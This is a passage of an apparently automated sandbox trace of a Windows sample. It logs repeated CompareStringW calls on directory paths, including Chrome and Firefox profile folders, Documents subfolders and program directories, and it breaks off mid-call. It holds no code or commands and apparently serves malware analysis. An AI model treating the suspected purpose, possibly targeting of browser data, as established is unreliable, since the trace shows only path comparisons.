(x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount2=40) returned 2 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\", cchCount2=78) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\", cchCount2=78) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\", cchCount2=78) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 1 [0064.347] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\l9h2RZXXX5kbGC\\sqqa\\", cchCount1=78, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount2=64) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount2=92) returned 2 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.348] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount2=47) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", cchCount1=40, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount2=47) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount1=66, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount2=47) returned 3 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G155GR\\", cchCount1=47, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount1=66, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount2=49) returned 3 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\", cchCount2=58) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount1=49, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\", cchCount2=58) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount1=66, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\", cchCount2=58) returned 3 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.349] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount2=97) returned 2 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\", cchCount1=49, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount1=66, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\21Ar6w3\\", cchCount2=66) returned 2 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount2=64) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount2=88) returned 2 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", cchCount1=88, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount2=64) returned 1 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount2=64) returned 3 [0064.350] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DAN\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount1=76, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\CSharp\\1033\\", cchCount1=92, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\", cchCount1=44, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\HRV\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\KOR\\", cchCount2=64) returned 1 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\", cchCount1=97, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", cchCount2=64) returned 3 [0064.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\DEU\\", cchCount1=64, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\", 